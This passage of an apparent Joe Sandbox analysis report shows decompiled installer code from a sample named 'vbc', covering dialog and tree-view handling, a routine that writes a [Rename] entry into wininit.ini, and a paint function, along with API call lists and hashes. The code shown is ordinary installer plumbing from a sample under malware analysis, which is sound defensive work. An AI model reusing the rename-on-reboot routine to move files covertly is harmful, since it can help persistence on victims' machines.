                                          						} else {
                                          							goto L48;
                                          						}
                                          					} else {
                                          						L48:
                                          						if(_a8 != 0x111) {
                                          							L56:
                                          							if(_a8 == 0x200) {
                                          								SendMessageW(_v8, 0x200, 0, 0);
                                          							}
                                          							if(_a8 == 0x40b) {
                                          								_t225 =  *0x7a1f6c;
                                          								if(_t225 != 0) {
                                          									ImageList_Destroy(_t225);
                                          								}
                                          								_t226 =  *0x7a1f80;
                                          								if(_t226 != 0) {
                                          									GlobalFree(_t226);
                                          								}
                                          								 *0x7a1f6c = 0;
                                          								 *0x7a1f80 = 0;
                                          								 *0x7a8b00 = 0;
                                          							}
                                          							if(_a8 != 0x40f) {
                                          								L90:
                                          								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
                                          									_t324 = (0 | _a16 == 0x00000020) << 3;
                                          									ShowWindow(_v8, _t324);
                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                          								}
                                          								goto L93;
                                          							} else {
                                          								E004011EF(_t301, 0, 0);
                                          								_t198 = _a12;
                                          								if(_t198 != 0) {
                                          									if(_t198 != 0xffffffff) {
                                          										_t198 = _t198 - 1;
                                          									}
                                          									_push(_t198);
                                          									_push(8);
                                          									E00405005();
                                          								}
                                          								if(_a16 == 0) {
                                          									L75:
                                          									E004011EF(_t301, 0, 0);
                                          									_v36 =  *0x7a1f80;
                                          									_t201 =  *0x7a8ac8;
                                          									_v64 = 0xf030;
                                          									_v24 = 0;
                                          									if( *0x7a8acc <= 0) {
                                          										L86:
                                          										if( *0x7a8b5e == 0x400) {
                                          											InvalidateRect(_v8, 0, 1);
                                          										}
                                          										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
                                          											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
                                          										}
                                          										goto L90;
                                          									}
                                          									_t292 = _t201 + 8;
                                          									do {
                                          										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                          										if(_t207 != 0) {
                                          											_t303 =  *_t292;
                                          											_v72 = _t207;
                                          											_v76 = 8;
                                          											if((_t303 & 0x00000001) != 0) {
                                          												_v76 = 9;
                                          												_v60 =  &(_t292[4]);
                                          												_t292[0] = _t292[0] & 0x000000fe;
                                          											}
                                          											if((_t303 & 0x00000040) == 0) {
                                          												_t211 = (_t303 & 0x00000001) + 1;
                                          												if((_t303 & 0x00000010) != 0) {
                                          													_t211 = _t211 + 3;
                                          												}
                                          											} else {
                                          												_t211 = 3;
                                          											}
                                          											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                          											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                          											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                          										}
                                          										_v24 = _v24 + 1;
                                          										_t292 =  &(_t292[0x206]);
                                          									} while (_v24 <  *0x7a8acc);
                                          									goto L86;
                                          								} else {
                                          									_t293 = E004012E2( *0x7a1f80);
                                          									E00401299(_t293);
                                          									_t222 = 0;
                                          									_t301 = 0;
                                          									if(_t293 <= 0) {
                                          										L74:
                                          										SendMessageW(_v12, 0x14e, _t301, 0);
                                          										_a16 = _t293;
                                          										_a8 = 0x420;
                                          										goto L75;
                                          									} else {
                                          										goto L71;
                                          									}
                                          									do {
                                          										L71:
                                          										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                          											_t301 = _t301 + 1;
                                          										}
                                          										_t222 = _t222 + 1;
                                          									} while (_t222 < _t293);
                                          									goto L74;
                                          								}
                                          							}
                                          						}
                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                          							goto L93;
                                          						} else {
                                          							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                          							if(_t232 == 0xffffffff) {
                                          								goto L93;
                                          							}
                                          							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                          							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                          								_t294 = 0x20;
                                          							}
                                          							E00401299(_t294);
                                          							SendMessageW(_a4, 0x420, 0, _t294);
                                          							_a12 = _a12 | 0xffffffff;
                                          							_a16 = 0;
                                          							_a8 = 0x40f;
                                          							goto L56;
                                          						}
                                          					}
                                          				} else {
                                          					_v36 = 0;
                                          					_v20 = 2;
                                          					 *0x7a8b00 = _t291;
                                          					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
                                          					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
                                          					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
                                          					_t297 = _t258;
                                          					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
                                          					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                          					 *0x7a1f6c = _t260;
                                          					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                          					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
                                          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                          						SendMessageW(_v8, 0x111b, 0x10, 0);
                                          					}
                                          					DeleteObject(_t297);
                                          					_t298 = 0;
                                          					do {
                                          						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                          						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                          							if(_t298 != 0x20) {
                                          								_v20 = 0;
                                          							}
                                          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
                                          						}
                                          						_t298 = _t298 + 1;
                                          					} while (_t298 < 0x21);
                                          					_t299 = _a16;
                                          					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                          					_push(0x15);
                                          					E004045CA(_a4);
                                          					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                          					_push(0x16);
                                          					E004045CA(_a4);
                                          					_t300 = 0;
                                          					_v16 = 0;
                                          					if( *0x7a8acc <= 0) {
                                          						L19:
                                          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                          						goto L20;
                                          					} else {
                                          						_t319 = _v24 + 8;
                                          						_v32 = _t319;
                                          						do {
                                          							_t278 =  &(_t319[0x10]);
                                          							if( *_t278 != 0) {
                                          								_v64 = _t278;
                                          								_t279 =  *_t319;
                                          								_v88 = _v16;
                                          								_t311 = 0x20;
                                          								_v84 = 0xffff0002;
                                          								_v80 = 0xd;
                                          								_v68 = _t311;
                                          								_v44 = _t300;
                                          								_v72 = _t279 & _t311;
                                          								if((_t279 & 0x00000002) == 0) {
                                          									if((_t279 & 0x00000004) == 0) {
                                          										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                          									} else {
                                          										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                          									}
                                          								} else {
                                          									_v80 = 0x4d;
                                          									_v48 = 1;
                                          									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                          									_v36 = 1;
                                          									 *( *0x7a1f80 + _t300 * 4) = _t284;
                                          									_v16 =  *( *0x7a1f80 + _t300 * 4);
                                          								}
                                          							}
                                          							_t300 = _t300 + 1;
                                          							_t319 =  &(_v32[0x818]);
                                          							_v32 = _t319;
                                          						} while (_t300 <  *0x7a8acc);
                                          						if(_v36 != 0) {
                                          							L20:
                                          							if(_v20 != 0) {
                                          								E004045FF(_v8);
                                          								goto L23;
                                          							} else {
                                          								ShowWindow(_v12, 5);
                                          								E004045FF(_v12);
                                          								L93:
                                          								return E00404631(_a8, _a12, _a16);
                                          							}
                                          						}
                                          						goto L19;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 0040504F
                                          • GetDlgItem.USER32(?,00000408), ref: 0040505A
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
                                          • LoadImageW.USER32 ref: 004050BB
                                          • SetWindowLongW.USER32 ref: 004050D4
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
                                          • DeleteObject.GDI32(00000000), ref: 00405131
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
                                            • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00405275
                                          • SetWindowLongW.USER32 ref: 00405283
                                          • ShowWindow.USER32(?,00000005), ref: 00405293
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
                                          • ImageList_Destroy.COMCTL32(?), ref: 00405461
                                          • GlobalFree.KERNEL32(?), ref: 00405471
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
                                          • ShowWindow.USER32(?,00000000), ref: 0040561B
                                          • GetDlgItem.USER32(?,000003FE), ref: 00405626
                                          • ShowWindow.USER32(00000000), ref: 0040562D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 2564846305-813528018
                                          • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                          • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
                                          • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
                                          • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                          				char _v8;
                                          				int _v12;
                                          				void* _v16;
                                          				struct HWND__* _t56;
                                          				signed int _t75;
                                          				signed short* _t76;
                                          				signed short* _t78;
                                          				long _t92;
                                          				int _t103;
                                          				signed int _t110;
                                          				intOrPtr _t113;
                                          				WCHAR* _t114;
                                          				signed int* _t116;
                                          				WCHAR* _t117;
                                          				struct HWND__* _t118;
                                          
                                          				if(_a8 != 0x110) {
                                          					if(_a8 != 0x111) {
                                          						L13:
                                          						if(_a8 != 0x4e) {
                                          							if(_a8 == 0x40b) {
                                          								 *0x79ff54 =  *0x79ff54 + 1;
                                          							}
                                          							L27:
                                          							_t114 = _a16;
                                          							L28:
                                          							return E00404631(_a8, _a12, _t114);
                                          						}
                                          						_t56 = GetDlgItem(_a4, 0x3e8);
                                          						_t114 = _a16;
                                          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                          							_v12 = _t103;
                                          							_v16 = _t113;
                                          							_v8 = 0x7a6a40;
                                          							if(_t103 - _t113 < 0x800) {
                                          								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                          								SetCursor(LoadCursorW(0, 0x7f02));
                                          								_push(1);
                                          								_t44 =  &_v8; // 0x7a6a40
                                          								E00404A38(_a4,  *_t44);
                                          								SetCursor(LoadCursorW(0, 0x7f00));
                                          								_t114 = _a16;
                                          							}
                                          						}
                                          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                          							goto L28;
                                          						} else {
                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                          								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
                                          							}
                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                          								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
                                          							}
                                          							return 1;
                                          						}
                                          					}
                                          					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
                                          						goto L27;
                                          					} else {
                                          						_t116 =  *0x7a0f60 + 0x14;
                                          						if(( *_t116 & 0x00000020) == 0) {
                                          							goto L27;
                                          						}
                                          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                          						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                          						E00404A14();
                                          						goto L13;
                                          					}
                                          				}
                                          				_t117 = _a16;
                                          				_t75 =  *(_t117 + 0x30);
                                          				if(_t75 < 0) {
                                          					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
                                          				}
                                          				_t76 =  *0x7a8ad8 + _t75 * 2;
                                          				_t110 =  *_t76 & 0x0000ffff;
                                          				_a8 = _t110;
                                          				_t78 =  &(_t76[1]);
                                          				_a16 = _t78;
                                          				_v16 = _t78;
                                          				_v12 = 0;
                                          				_v8 = E0040473A;
                                          				if(_t110 != 2) {
                                          					_v8 = E00404700;
                                          				}
                                          				_push( *((intOrPtr*)(_t117 + 0x34)));
                                          				_push(0x22);
                                          				E004045CA(_a4);
                                          				_push( *((intOrPtr*)(_t117 + 0x38)));
                                          				_push(0x23);
                                          				E004045CA(_a4);
                                          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                          				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                          				_t118 = GetDlgItem(_a4, 0x3e8);
                                          				E004045FF(_t118);
                                          				SendMessageW(_t118, 0x45b, 1, 0);
                                          				_t92 =  *( *0x7a8ab0 + 0x68);
                                          				if(_t92 < 0) {
                                          					_t92 = GetSysColor( ~_t92);
                                          				}
                                          				SendMessageW(_t118, 0x443, 0, _t92);
                                          				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                          				 *0x79ff54 = 0;
                                          				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                          				 *0x79ff54 = 0;
                                          				return 0;
                                          			}

                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040483B
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
                                          • GetSysColor.USER32 ref: 00404869
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
                                          • lstrlenW.KERNEL32(?), ref: 0040488A
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                                          • GetDlgItem.USER32(?,0000040A), ref: 00404905
                                          • SendMessageW.USER32(00000000), ref: 0040490C
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404937
                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                                          • LoadCursorW.USER32 ref: 00404988
                                          • SetCursor.USER32(00000000), ref: 0040498B
                                          • LoadCursorW.USER32 ref: 004049A4
                                          • SetCursor.USER32(00000000), ref: 004049A7
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: @jz$N
                                          • API String ID: 3103080414-4087404676
                                          • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                          • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                                          • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                          • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004062B4(void* __ecx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				long _t12;
                                          				long _t24;
                                          				char* _t31;
                                          				int _t37;
                                          				void* _t38;
                                          				intOrPtr* _t39;
                                          				long _t42;
                                          				WCHAR* _t44;
                                          				void* _t46;
                                          				void* _t48;
                                          				void* _t49;
                                          				void* _t52;
                                          				void* _t53;
                                          
                                          				_t38 = __ecx;
                                          				_t44 =  *(_t52 + 0x14);
                                          				 *0x7a5628 = 0x55004e;
                                          				 *0x7a562c = 0x4c;
                                          				if(_t44 == 0) {
                                          					L3:
                                          					_t2 = _t52 + 0x1c; // 0x7a5e28
                                          					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                          						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
                                          						_t53 = _t52 + 0x10;
                                          						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
                                          						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
                                          						_t48 = _t12;
                                          						 *(_t53 + 0x18) = _t48;
                                          						if(_t48 != 0xffffffff) {
                                          							_t42 = GetFileSize(_t48, 0);
                                          							_t6 = _t37 + 0xa; // 0xa
                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                          							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
                                          								L18:
                                          								return CloseHandle(_t48);
                                          							} else {
                                          								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
                                          									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
                                          									if(_t49 == 0) {
                                          										_t48 =  *(_t53 + 0x18);
                                          										L16:
                                          										_t24 = _t42;
                                          										L17:
                                          										E00406119(_t24 + _t46, 0x7a5228, _t37);
                                          										SetFilePointer(_t48, 0, 0, 0);
                                          										E00406210(_t48, _t46, _t42 + _t37);
                                          										GlobalFree(_t46);
                                          										goto L18;
                                          									}
                                          									_t39 = _t46 + _t42;
                                          									_t31 = _t39 + _t37;
                                          									while(_t39 > _t49) {
                                          										 *_t31 =  *_t39;
                                          										_t31 = _t31 - 1;
                                          										_t39 = _t39 - 1;
                                          									}
                                          									_t24 = _t49 - _t46 + 1;
                                          									_t48 =  *(_t53 + 0x18);
                                          									goto L17;
                                          								}
                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                          								_t42 = _t42 + 0xa;
                                          								goto L16;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					CloseHandle(E0040615E(_t44, 0, 1));
                                          					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                          						goto L3;
                                          					}
                                          				}
                                          				return _t12;
                                          			}

                                          APIs
                                          • CloseHandle.KERNEL32(00000000), ref: 004062EF
                                          • GetShortPathNameW.KERNEL32 ref: 004062F8
                                            • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                            • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                          • GetShortPathNameW.KERNEL32 ref: 00406315
                                          • wsprintfA.USER32 ref: 00406333
                                          • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                                          • GlobalFree.KERNEL32(00000000), ref: 0040641C
                                          • CloseHandle.KERNEL32(00000000), ref: 00406423
                                            • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                            • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                                          • API String ID: 2171350718-2000197835
                                          • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                          • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                                          • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                          • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                          				struct tagLOGBRUSH _v16;
                                          				struct tagRECT _v32;
                                          				struct tagPAINTSTRUCT _v96;
                                          				struct HDC__* _t70;
                                          				struct HBRUSH__* _t87;
                                          				struct HFONT__* _t94;
                                          				long _t102;
                                          				signed int _t126;
                                          				struct HDC__* _t128;
                                          				intOrPtr _t130;
                                          
                                          				if(_a8 == 0xf) {
                                          					_t130 =  *0x7a8ab0;
                                          					_t70 = BeginPaint(_a4,  &_v96);
                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                          					_a8 = _t70;
                                          					GetClientRect(_a4,  &_v32);
                                          					_t126 = _v32.bottom;
                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                          					while(_v32.top < _t126) {
                                          						_a12 = _t126 - _v32.top;
                                          						asm("cdq");
                                          						asm("cdq");
                                          						asm("cdq");
                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                          						_t87 = CreateBrushIndirect( &_v16);
                                          						_v32.bottom = _v32.bottom + 4;
                                          						_a16 = _t87;
                                          						FillRect(_a8,  &_v32, _t87);
                                          						DeleteObject(_a16);
                                          						_v32.top = _v32.top + 4;
                                          					}
                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                          						_a16 = _t94;
                                          						if(_t94 != 0) {
                                          							_t128 = _a8;
                                          							_v32.left = 0x10;
                                          							_v32.top = 8;
                                          							SetBkMode(_t128, 1);
                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                          							_a8 = SelectObject(_t128, _a16);
                                          							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
                                          							SelectObject(_t128, _a8);
                                          							DeleteObject(_a16);
                                          						}
                                          					}
                                          					EndPaint(_a4,  &_v96);
                                          					return 0;
                                          				}
                                          				_t102 = _a16;
                                          				if(_a8 == 0x46) {
                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
                                          				}
                                          				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                          			}

                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32 ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
